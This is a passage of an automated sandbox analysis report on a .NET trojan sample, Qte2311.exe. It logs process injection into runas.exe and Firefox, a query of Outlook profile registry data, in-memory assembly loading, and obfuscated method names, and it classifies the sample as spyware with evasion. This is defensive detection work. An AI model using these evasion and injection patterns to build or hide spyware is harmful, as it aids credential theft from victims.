Source: C:\Users\user\Desktop\Qte2311.exe Process created: C:\Users\user\Desktop\Qte2311.exe C:\Users\user\Desktop\Qte2311.exe
Source: C:\Users\user\Desktop\Qte2311.exe Process created: C:\Users\user\Desktop\Qte2311.exe C:\Users\user\Desktop\Qte2311.exe
Source: C:\Program Files (x86)\jFJKUzqwKIBdWDkcySLyDBhTBgNTKdOJMfgYJclsrVfAJDMiwJDDVHpOzszTWBY\SoZyKEDyfEWrMWEFcBvwSAkabc.exe Process created: C:\Windows\SysWOW64\runas.exe C:\Windows\SysWOW64\runas.exe
Source: C:\Windows\SysWOW64\runas.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
Source: C:\Users\user\Desktop\Qte2311.exe Process created: C:\Users\user\Desktop\Qte2311.exe C:\Users\user\Desktop\Qte2311.exe Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Process created: C:\Users\user\Desktop\Qte2311.exe C:\Users\user\Desktop\Qte2311.exe Jump to behavior
Source: C:\Program Files (x86)\jFJKUzqwKIBdWDkcySLyDBhTBgNTKdOJMfgYJclsrVfAJDMiwJDDVHpOzszTWBY\SoZyKEDyfEWrMWEFcBvwSAkabc.exe Process created: C:\Windows\SysWOW64\runas.exe C:\Windows\SysWOW64\runas.exe Jump to behavior
Source: C:\Windows\SysWOW64\runas.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Qte2311.exe.log Jump to behavior
Source: C:\Windows\SysWOW64\runas.exe File created: C:\Users\user\AppData\Local\Temp\r27485 Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@9/2@14/8
Source: 0.2.Qte2311.exe.487a5a0.8.raw.unpack, wfAySfgxmRVIktpuXE.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Qte2311.exe.7f90000.13.raw.unpack, o4s30kp3VPcdxdjhAQ.cs Security API names: _0020.SetAccessControl
Source: 0.2.Qte2311.exe.7f90000.13.raw.unpack, o4s30kp3VPcdxdjhAQ.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Qte2311.exe.7f90000.13.raw.unpack, o4s30kp3VPcdxdjhAQ.cs Security API names: _0020.AddAccessRule
Source: 0.2.Qte2311.exe.7f90000.13.raw.unpack, wfAySfgxmRVIktpuXE.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Qte2311.exe.48f0dc0.9.raw.unpack, wfAySfgxmRVIktpuXE.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Qte2311.exe.48f0dc0.9.raw.unpack, o4s30kp3VPcdxdjhAQ.cs Security API names: _0020.SetAccessControl
Source: 0.2.Qte2311.exe.48f0dc0.9.raw.unpack, o4s30kp3VPcdxdjhAQ.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Qte2311.exe.48f0dc0.9.raw.unpack, o4s30kp3VPcdxdjhAQ.cs Security API names: _0020.AddAccessRule
Source: 0.2.Qte2311.exe.487a5a0.8.raw.unpack, o4s30kp3VPcdxdjhAQ.cs Security API names: _0020.SetAccessControl
Source: 0.2.Qte2311.exe.487a5a0.8.raw.unpack, o4s30kp3VPcdxdjhAQ.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Qte2311.exe.487a5a0.8.raw.unpack, o4s30kp3VPcdxdjhAQ.cs Security API names: _0020.AddAccessRule
Source: Qte2311.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\Qte2311.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\Desktop\Qte2311.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\runas.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: Qte2311.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Qte2311.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Qte2311.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: firefox.pdbP source: runas.exe, 00000005.00000003.2051699221.0000000008497000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000005.00000003.2000653669.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rcQ.pdb source: Qte2311.exe
Source: Binary string: runas.pdbGCTL source: Qte2311.exe, 00000003.00000002.1744564742.00000000013B7000.00000004.00000020.00020000.00000000.sdmp, SoZyKEDyfEWrMWEFcBvwSAkabc.exe, 00000004.00000002.4110091796.0000000000608000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: SoZyKEDyfEWrMWEFcBvwSAkabc.exe, 00000004.00000002.4110534706.000000000099E000.00000002.00000001.01000000.0000000C.sdmp, SoZyKEDyfEWrMWEFcBvwSAkabc.exe, 00000006.00000002.4110753572.000000000099E000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: wntdll.pdbUGP source: Qte2311.exe, 00000003.00000002.1744906371.0000000001810000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000005.00000003.1744647151.0000000004D03000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000005.00000002.4111359702.0000000005070000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000005.00000003.1747191633.0000000004EBD000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000005.00000002.4111359702.000000000520E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Qte2311.exe, Qte2311.exe, 00000003.00000002.1744906371.0000000001810000.00000040.00001000.00020000.00000000.sdmp, runas.exe, runas.exe, 00000005.00000003.1744647151.0000000004D03000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000005.00000002.4111359702.0000000005070000.00000040.00001000.00020000.00000000.sdmp, runas.exe, 00000005.00000003.1747191633.0000000004EBD000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000005.00000002.4111359702.000000000520E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: runas.pdb source: Qte2311.exe, 00000003.00000002.1744564742.00000000013B7000.00000004.00000020.00020000.00000000.sdmp, SoZyKEDyfEWrMWEFcBvwSAkabc.exe, 00000004.00000002.4110091796.0000000000608000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: firefox.pdb source: runas.exe, 00000005.00000003.2051699221.0000000008497000.00000004.00000020.00020000.00000000.sdmp, runas.exe, 00000005.00000003.2000653669.0000000007DEA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: rcQ.pdbSHA256 source: Qte2311.exe

Data Obfuscation

barindex
Source: 0.2.Qte2311.exe.487a5a0.8.raw.unpack, o4s30kp3VPcdxdjhAQ.cs .Net Code: gDTn2luWOJ System.Reflection.Assembly.Load(byte[])
Source: 0.2.Qte2311.exe.7f90000.13.raw.unpack, o4s30kp3VPcdxdjhAQ.cs .Net Code: gDTn2luWOJ System.Reflection.Assembly.Load(byte[])
Source: 0.2.Qte2311.exe.48f0dc0.9.raw.unpack, o4s30kp3VPcdxdjhAQ.cs .Net Code: gDTn2luWOJ System.Reflection.Assembly.Load(byte[])
Source: 0.2.Qte2311.exe.5d80000.10.raw.unpack, RFebBaClhEWIFvwxqU.cs .Net Code: System.Reflection.Assembly.Load(byte[])
Source: 0.2.Qte2311.exe.3573c38.7.raw.unpack, RFebBaClhEWIFvwxqU.cs .Net Code: System.Reflection.Assembly.Load(byte[])
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 0_2_01A704F0 pushad ; ret 0_2_01A704F9
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 0_2_01A75EB4 push dword ptr [edx+ebp*2-75h]; iretd 0_2_01A75EBF
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 0_2_01AE5947 pushfd ; retf 0_2_01AE5951
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0040220B pushad ; retf 3_2_0040220E
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0040222C pushad ; retf 3_2_0040222F
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_00412442 push ebx; ret 3_2_0041244C
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0041AC59 push edi; ret 3_2_0041AC5A
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0042B4B2 push eax; ret 3_2_0042B4B4
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_00417D29 push ds; ret 3_2_00417DF8
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_00415DC3 push edi; ret 3_2_00415DC9
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_00417DC4 push ds; ret 3_2_00417DF8
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_004037E0 push eax; ret 3_2_004037E2
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0181225F pushad ; ret 3_2_018127F9
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018127FA pushad ; ret 3_2_018127F9
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_018409AD push ecx; mov dword ptr [esp], ecx 3_2_018409B6
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_0181283D push eax; iretd 3_2_01812858
Source: C:\Users\user\Desktop\Qte2311.exe Code function: 3_2_01811200 push eax; iretd 3_2_01811369
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050727FA pushad ; ret 5_2_050727F9
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0507225F pushad ; ret 5_2_050727F9
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_050A09AD push ecx; mov dword ptr [esp], ecx 5_2_050A09B6
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_0507283D push eax; iretd 5_2_05072858
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02FB01BA push eax; iretd 5_2_02FB01CA
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02FB21A0 push ds; iretd 5_2_02FB21A6
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02FA25E0 push edi; ret 5_2_02FA25E6
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02FB48DD push ebx; retf 5_2_02FB493A
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02F9EC5F push ebx; ret 5_2_02F9EC69
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02FA1B80 push esi; ret 5_2_02FA1B8A
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02FA1B79 push esi; ret 5_2_02FA1B8A
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02FB19C8 push ecx; retf 5_2_02FB19D5
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02FAF97B push es; iretd 5_2_02FAF9CF
Source: C:\Windows\SysWOW64\runas.exe Code function: 5_2_02FB7CCF push eax; ret 5_2_02FB7CD1
Source: initial sample Static PE information: section name: .text entropy: 7.981884618457205
Source: 0.2.Qte2311.exe.487a5a0.8.raw.unpack, Voy8b6ZMRukkb5xiDt.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'pO2dCcJvsK', 'wpidkbkyXD', 'Fx7dzWuPUu', 'jNPIsoaYaX', 'hSXIygC4aK', 'mPaIdEGp99', 'v1sIIUEYhX', 'LkXQoku0DI6vM9Wxnx7'
Source: 0.2.Qte2311.exe.487a5a0.8.raw.unpack, xUWyhiysamSMKd6myu7.cs High entropy of concatenated method names: 'FDVxYrGG4u', 'UKZxTZ4Aw2', 'dWmx2GRjrU', 'Gx8xePp34d', 'HxMxjl9JH3', 'mv0xuGl0aF', 'IkJxok3ELm', 'hZKxgmmmUo', 'rBWxBEaAZo', 'vHXxmWkKs2'
Source: 0.2.Qte2311.exe.487a5a0.8.raw.unpack, qoYjUVK186LcMneFXY.cs High entropy of concatenated method names: 'fcC5MuhoDAVC8fpITqf', 'IyepUGhFlsrkbSJd1x7', 'txZPXWN0RN', 'V06PxloTRy', 'nZqPvp8GuL', 'E2NSR4hqdgNvWYsWbXG', 'ThiR6EhEX1Yc48kpaLn'
Source: 0.2.Qte2311.exe.487a5a0.8.raw.unpack, cbw4BF7hc8WltC5E28.cs High entropy of concatenated method names: 'cHMNglOSEr', 'MaJNBYSMyq', 'AdgN8APjx1', 'sIJNKKRqhF', 'H8HNLbDZFZ', 'nbFNRy0sfG', 'AAqNDw7c27', 'h3tNA535WE', 'Of4NqwXQEk', 'HBJNVCohJh'
Source: 0.2.Qte2311.exe.487a5a0.8.raw.unpack, OGsM83nPkcRxEWcFWw.cs High entropy of concatenated method names: 'SP3yFfAySf', 'rmRypVIktp', 'yoNya4k6kY', 'JAYytkWgTE', 'HXNyixkdWX', 'V27yMxdQ8q', 'rpZL0tUmb3kXXdXjlh', 'D3AH0UrnfPO2ag4uJI', 'W7KyyacvkX', 'XI8yI7RiGo'
Source: 0.2.Qte2311.exe.487a5a0.8.raw.unpack, r8Z1FTBoN4k6kYRAYk.cs High entropy of concatenated method names: 'y22ZeiEHYw', 'KEnZufeL8a', 'GYNZgo6ueu', 'hWlZBjEOhu', 'a6LZioZWCE', 'MuMZMfbgM9', 'iZaZHhvA2G', 'dgyZX70oxi', 'La1Zxgi0y6', 'w21ZvUEc80'
Source: 0.2.Qte2311.exe.487a5a0.8.raw.unpack, TkSvfg47RObi0XIVRI.cs High entropy of concatenated method names: 'CNUiqO2Tqr', 'Qb4i9IjF6k', 'mtti4YfSOn', 'UopiJueOJi', 'nR5iKjIgrw', 'jegi0rbxft', 'OvGiLuHR8u', 'AxqiRsi2DI', 'HWaiUMnBIx', 'DHkiD3xO6K'
Source: 0.2.Qte2311.exe.487a5a0.8.raw.unpack, U5pRMPCa6VC6HGfiEZ.cs High entropy of concatenated method names: 'eB9X8BHpn7', 'YNuXKUixdY', 'SjgX0KIo3j', 'QL8XLnVZst', 'fImX4FjQjK', 'CQSXRdKE93', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Qte2311.exe.487a5a0.8.raw.unpack, VPZ6xUzKp1Ls0mJXyg.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'yqpxNIrZmt', 'csexiw5ePy', 'PjLxMdiCCH', 'NL8xH2wM0X', 'HJ6xXWybYj', 'eqaxxnfAIy', 'g2Qxv0oHVi'
Source: 0.2.Qte2311.exe.487a5a0.8.raw.unpack, o4s30kp3VPcdxdjhAQ.cs High entropy of concatenated method names: 'EIVIQSkH7H', 'TA7IWpuOcg', 'uFFIrlAF8X', 'U70IZP1COR', 'naIIw5fwfw', 'ui6IPxvgky', 'bpFIFX2qc4', 'nn6IpsYJLE', 'dakIcYNgGC', 'DWUIaRKRJf'
Source: 0.2.Qte2311.exe.487a5a0.8.raw.unpack, ovhRaAGpf1fMbU5l9h.cs High entropy of concatenated method names: 'ToString', 'kfkMV0Y6KM', 'pHhMK4MvLo', 'wQfM0QuLCP', 'SGuML4Am2X', 'dbkMRiHdL7', 'RRVMU42owk', 'l4DMDtESw2', 'NVZMA1XqN3', 'gOHM1Z6RsP'
Source: 0.2.Qte2311.exe.487a5a0.8.raw.unpack, cC3eJfhCkmhjbdHysN.cs High entropy of concatenated method names: 'OZXXWFmXPa', 'IArXrMQh9L', 'ifRXZqMAf5', 'brnXwmbyhC', 'StXXPd4LIx', 'GCLXFMdwaS', 'jQkXpk34NO', 'cmFXcI8PeY', 'wcXXa7854p', 'U6jXtfJqFv'
Source: 0.2.Qte2311.exe.487a5a0.8.raw.unpack, meriZ7EYoOBu2ojZb8.cs High entropy of concatenated method names: 'w7fHhlfmqD', 'TdRHkDwv0T', 'cxIXsI2bOO', 'Qw8XybGeUr', 'VYeHVtWfJ4', 'w4RH9Rk82k', 'N1vH7pyY7w', 'tm6H40Qvds', 'SLXHJqDStj', 'TyrHGGHNbQ'
Source: 0.2.Qte2311.exe.487a5a0.8.raw.unpack, bWXE278xdQ8qkeWCIX.cs High entropy of concatenated method names: 'Dn9PQl9BeS', 'HVIPrwTRyA', 'h8aPw25IfY', 'PbQPFtPtFm', 'JJSPpf2kmB', 'WFUwf4Vp10', 'xA6wEPbxu3', 'mH0wSVV4o1', 'P02whNqfnw', 'tZSwCyMQFL'
Source: 0.2.Qte2311.exe.487a5a0.8.raw.unpack, NQYow7deJNioTERq6h.cs High entropy of concatenated method names: 'YY42tKnFY', 'wqKev2KiW', 'xGbuxUycS', 'qXqol7dS9', 'lELBoVp9k', 'UclmtNCf8', 'srmumlG0GGbFwFGjal', 'ReIMv2jdeqtemx1Qfg', 'UCfXrTJhu', 'r60vVFD7b'
Source: 0.2.Qte2311.exe.487a5a0.8.raw.unpack, wfAySfgxmRVIktpuXE.cs High entropy of concatenated method names: 'ctZr43FsKS', 'To9rJyUqXo', 'S9drGlpDEr', 'UutrlnijEg', 'i5JrfEdNfw', 'K6erET80bH', 'WPPrSTlAx4', 'DEJrhK6TAT', 'uAbrCAgx9a', 'QGprkt0gcO'
Source: 0.2.Qte2311.exe.487a5a0.8.raw.unpack, iQCLXtrLIG6D8GYfAs.cs High entropy of concatenated method names: 'Dispose', 'kDsyCnc8j6', 'U3HdKcOSrw', 'F4rRRfwpCa', 'HdCyk3eJfC', 'YmhyzjbdHy', 'ProcessDialogKey', 'aNfds5pRMP', 'm6VdyC6HGf', 'oEZddast9X'
Source: 0.2.Qte2311.exe.487a5a0.8.raw.unpack, FAQOrgyIQbmeQ1OYZno.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jpgv4rLqD5', 'gkMvJtpn2k', 'b1WvGswW6o', 've4vlYk3wg', 'nc0vfsW4HT', 'Y2hvEWdEUO', 'jnJvS9AsIZ'
Source: 0.2.Qte2311.exe.487a5a0.8.raw.unpack, KhxNDu1Lf1HxQS38aY.cs High entropy of concatenated method names: 'WTKFYE264Z', 'ldSFTpt4nN', 'uKtF24eYDg', 'POHFelECrO', 'hmFFjFGCX2', 'fNfFuWkwGB', 'kGAFoHJSAW', 'PZ2Fg6n3ns', 'sLEFBkFdtP', 'Wa8FmcKLmW'
Source: 0.2.Qte2311.exe.487a5a0.8.raw.unpack, mst9XkkeDYOXv81Yuy.cs High entropy of concatenated method names: 'UMpxy1lwB4', 'BppxIK8YJR', 'Lwbxndn8Db', 'lvVxWrxnft', 'PyqxrhBv3M', 'Q8rxwC5Lwx', 'TfLxP3i7v5', 'K3XXS6t6fd', 'Q9XXhvnqJD', 'EGYXCyTQcl'
Source: 0.2.Qte2311.exe.487a5a0.8.raw.unpack, XiuuH8DXABAeATYjnw.cs High entropy of concatenated method names: 'Dn3FWmjfeq', 'x85FZi0UhN', 'OQcFPbeiod', 'PMxPkO0joH', 'hevPzRsnlZ', 'mpQFskqNDh', 'VLsFy3fJyk', 'jbMFdZ1dCA', 'fKJFIIsbxO', 'xm4Fne1T0R'
Source: 0.2.Qte2311.exe.7f90000.13.raw.unpack, Voy8b6ZMRukkb5xiDt.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'pO2dCcJvsK', 'wpidkbkyXD', 'Fx7dzWuPUu', 'jNPIsoaYaX', 'hSXIygC4aK', 'mPaIdEGp99', 'v1sIIUEYhX', 'LkXQoku0DI6vM9Wxnx7'
Source: 0.2.Qte2311.exe.7f90000.13.raw.unpack, xUWyhiysamSMKd6myu7.cs High entropy of concatenated method names: 'FDVxYrGG4u', 'UKZxTZ4Aw2', 'dWmx2GRjrU', 'Gx8xePp34d', 'HxMxjl9JH3', 'mv0xuGl0aF', 'IkJxok3ELm', 'hZKxgmmmUo', 'rBWxBEaAZo', 'vHXxmWkKs2'
Source: 0.2.Qte2311.exe.7f90000.13.raw.unpack, qoYjUVK186LcMneFXY.cs High entropy of concatenated method names: 'fcC5MuhoDAVC8fpITqf', 'IyepUGhFlsrkbSJd1x7', 'txZPXWN0RN', 'V06PxloTRy', 'nZqPvp8GuL', 'E2NSR4hqdgNvWYsWbXG', 'ThiR6EhEX1Yc48kpaLn'
Source: 0.2.Qte2311.exe.7f90000.13.raw.unpack, cbw4BF7hc8WltC5E28.cs High entropy of concatenated method names: 'cHMNglOSEr', 'MaJNBYSMyq', 'AdgN8APjx1', 'sIJNKKRqhF', 'H8HNLbDZFZ', 'nbFNRy0sfG', 'AAqNDw7c27', 'h3tNA535WE', 'Of4NqwXQEk', 'HBJNVCohJh'
Source: 0.2.Qte2311.exe.7f90000.13.raw.unpack, OGsM83nPkcRxEWcFWw.cs High entropy of concatenated method names: 'SP3yFfAySf', 'rmRypVIktp', 'yoNya4k6kY', 'JAYytkWgTE', 'HXNyixkdWX', 'V27yMxdQ8q', 'rpZL0tUmb3kXXdXjlh', 'D3AH0UrnfPO2ag4uJI', 'W7KyyacvkX', 'XI8yI7RiGo'
Source: 0.2.Qte2311.exe.7f90000.13.raw.unpack, r8Z1FTBoN4k6kYRAYk.cs High entropy of concatenated method names: 'y22ZeiEHYw', 'KEnZufeL8a', 'GYNZgo6ueu', 'hWlZBjEOhu', 'a6LZioZWCE', 'MuMZMfbgM9', 'iZaZHhvA2G', 'dgyZX70oxi', 'La1Zxgi0y6', 'w21ZvUEc80'
Source: 0.2.Qte2311.exe.7f90000.13.raw.unpack, TkSvfg47RObi0XIVRI.cs High entropy of concatenated method names: 'CNUiqO2Tqr', 'Qb4i9IjF6k', 'mtti4YfSOn', 'UopiJueOJi', 'nR5iKjIgrw', 'jegi0rbxft', 'OvGiLuHR8u', 'AxqiRsi2DI', 'HWaiUMnBIx', 'DHkiD3xO6K'
Source: 0.2.Qte2311.exe.7f90000.13.raw.unpack, U5pRMPCa6VC6HGfiEZ.cs High entropy of concatenated method names: 'eB9X8BHpn7', 'YNuXKUixdY', 'SjgX0KIo3j', 'QL8XLnVZst', 'fImX4FjQjK', 'CQSXRdKE93', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.Qte2311.exe.7f90000.13.raw.unpack, VPZ6xUzKp1Ls0mJXyg.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'yqpxNIrZmt', 'csexiw5ePy', 'PjLxMdiCCH', 'NL8xH2wM0X', 'HJ6xXWybYj', 'eqaxxnfAIy', 'g2Qxv0oHVi'
Source: 0.2.Qte2311.exe.7f90000.13.raw.unpack, o4s30kp3VPcdxdjhAQ.cs High entropy of concatenated method names: 'EIVIQSkH7H', 'TA7IWpuOcg', 'uFFIrlAF8X', 'U70IZP1COR', 'naIIw5fwfw', 'ui6IPxvgky', 'bpFIFX2qc4', 'nn6IpsYJLE', 'dakIcYNgGC', 'DWUIaRKRJf'
Source: 0.2.Qte2311.exe.7f90000.13.raw.unpack, ovhRaAGpf1fMbU5l9h.cs High entropy of concatenated method names: 'ToString', 'kfkMV0Y6KM', 'pHhMK4MvLo', 'wQfM0QuLCP', 'SGuML4Am2X', 'dbkMRiHdL7', 'RRVMU42owk', 'l4DMDtESw2', 'NVZMA1XqN3', 'gOHM1Z6RsP'
Source: 0.2.Qte2311.exe.7f90000.13.raw.unpack, cC3eJfhCkmhjbdHysN.cs High entropy of concatenated method names: 'OZXXWFmXPa', 'IArXrMQh9L', 'ifRXZqMAf5', 'brnXwmbyhC', 'StXXPd4LIx', 'GCLXFMdwaS', 'jQkXpk34NO', 'cmFXcI8PeY', 'wcXXa7854p', 'U6jXtfJqFv'
Source: 0.2.Qte2311.exe.7f90000.13.raw.unpack, meriZ7EYoOBu2ojZb8.cs High entropy of concatenated method names: 'w7fHhlfmqD', 'TdRHkDwv0T', 'cxIXsI2bOO', 'Qw8XybGeUr', 'VYeHVtWfJ4', 'w4RH9Rk82k', 'N1vH7pyY7w', 'tm6H40Qvds', 'SLXHJqDStj', 'TyrHGGHNbQ'
Source: 0.2.Qte2311.exe.7f90000.13.raw.unpack, bWXE278xdQ8qkeWCIX.cs High entropy of concatenated method names: 'Dn9PQl9BeS', 'HVIPrwTRyA', 'h8aPw25IfY', 'PbQPFtPtFm', 'JJSPpf2kmB', 'WFUwf4Vp10', 'xA6wEPbxu3', 'mH0wSVV4o1', 'P02whNqfnw', 'tZSwCyMQFL'
Source: 0.2.Qte2311.exe.7f90000.13.raw.unpack, NQYow7deJNioTERq6h.cs High entropy of concatenated method names: 'YY42tKnFY', 'wqKev2KiW', 'xGbuxUycS', 'qXqol7dS9', 'lELBoVp9k', 'UclmtNCf8', 'srmumlG0GGbFwFGjal', 'ReIMv2jdeqtemx1Qfg', 'UCfXrTJhu', 'r60vVFD7b'
Source: 0.2.Qte2311.exe.7f90000.13.raw.unpack, wfAySfgxmRVIktpuXE.cs High entropy of concatenated method names: 'ctZr43FsKS', 'To9rJyUqXo', 'S9drGlpDEr', 'UutrlnijEg', 'i5JrfEdNfw', 'K6erET80bH', 'WPPrSTlAx4', 'DEJrhK6TAT', 'uAbrCAgx9a', 'QGprkt0gcO'
Source: 0.2.Qte2311.exe.7f90000.13.raw.unpack, iQCLXtrLIG6D8GYfAs.cs High entropy of concatenated method names: 'Dispose', 'kDsyCnc8j6', 'U3HdKcOSrw', 'F4rRRfwpCa', 'HdCyk3eJfC', 'YmhyzjbdHy', 'ProcessDialogKey', 'aNfds5pRMP', 'm6VdyC6HGf', 'oEZddast9X'
Source: 0.2.Qte2311.exe.7f90000.13.raw.unpack, FAQOrgyIQbmeQ1OYZno.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jpgv4rLqD5', 'gkMvJtpn2k', 'b1WvGswW6o', 've4vlYk3wg', 'nc0vfsW4HT', 'Y2hvEWdEUO', 'jnJvS9AsIZ'
Source: 0.2.Qte2311.exe.7f90000.13.raw.unpack, KhxNDu1Lf1HxQS38aY.cs High entropy of concatenated method names: 'WTKFYE264Z', 'ldSFTpt4nN', 'uKtF24eYDg', 'POHFelECrO', 'hmFFjFGCX2', 'fNfFuWkwGB', 'kGAFoHJSAW', 'PZ2Fg6n3ns', 'sLEFBkFdtP', 'Wa8FmcKLmW'
Source: 0.2.Qte2311.exe.7f90000.13.raw.unpack, mst9XkkeDYOXv81Yuy.cs High entropy of concatenated method names: 'UMpxy1lwB4', 'BppxIK8YJR', 'Lwbxndn8Db', 'lvVxWrxnft', 'PyqxrhBv3M', 'Q8rxwC5Lwx', 'TfLxP3i7v5', 'K3XXS6t6fd', 'Q9XXhvnqJD', 'EGYXCyTQcl'
Source: 0.2.Qte2311.exe.7f90000.13.raw.unpack, XiuuH8DXABAeATYjnw.cs High entropy of concatenated method names: 'Dn3FWmjfeq', 'x85FZi0UhN', 'OQcFPbeiod', 'PMxPkO0joH', 'hevPzRsnlZ', 'mpQFskqNDh', 'VLsFy3fJyk', 'jbMFdZ1dCA', 'fKJFIIsbxO', 'xm4Fne1T0R'
Source: 0.2.Qte2311.exe.48f0dc0.9.raw.unpack, Voy8b6ZMRukkb5xiDt.cs High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'pO2dCcJvsK', 'wpidkbkyXD', 'Fx7dzWuPUu', 'jNPIsoaYaX', 'hSXIygC4aK', 'mPaIdEGp99', 'v1sIIUEYhX', 'LkXQoku0DI6vM9Wxnx7'
Source: 0.2.Qte2311.exe.48f0dc0.9.raw.unpack, xUWyhiysamSMKd6myu7.cs High entropy of concatenated method names: 'FDVxYrGG4u', 'UKZxTZ4Aw2', 'dWmx2GRjrU', 'Gx8xePp34d', 'HxMxjl9JH3', 'mv0xuGl0aF', 'IkJxok3ELm', 'hZKxgmmmUo', 'rBWxBEaAZo', 'vHXxmWkKs2'
Source: 0.2.Qte2311.exe.48f0dc0.9.raw.unpack, qoYjUVK186LcMneFXY.cs High entropy of concatenated method names: 'fcC5MuhoDAVC8fpITqf', 'IyepUGhFlsrkbSJd1x7', 'txZPXWN0RN', 'V06PxloTRy', 'nZqPvp8GuL', 'E2NSR4hqdgNvWYsWbXG', 'ThiR6EhEX1Yc48kpaLn'
Source: 0.2.Qte2311.exe.48f0dc0.9.raw.unpack, cbw4BF7hc8WltC5E28.cs High entropy of concatenated method names: 'cHMNglOSEr', 'MaJNBYSMyq', 'AdgN8APjx1', 'sIJNKKRqhF', 'H8HNLbDZFZ', 'nbFNRy0sfG', 'AAqNDw7c27', 'h3tNA535WE', 'Of4NqwXQEk', 'HBJNVCohJh'
Source: 0.2.Qte2311.exe.48f0dc0.9.raw.unpack, OGsM83nPkcRxEWcFWw.cs High entropy of concatenated method names: 'SP3yFfAySf', 'rmRypVIktp', 'yoNya4k6kY', 'JAYytkWgTE', 'HXNyixkdWX', 'V27yMxdQ8q', 'rpZL0tUmb3kXXdXjlh', 'D3AH0UrnfPO2ag4uJI', 'W7KyyacvkX', 'XI8yI7RiGo'
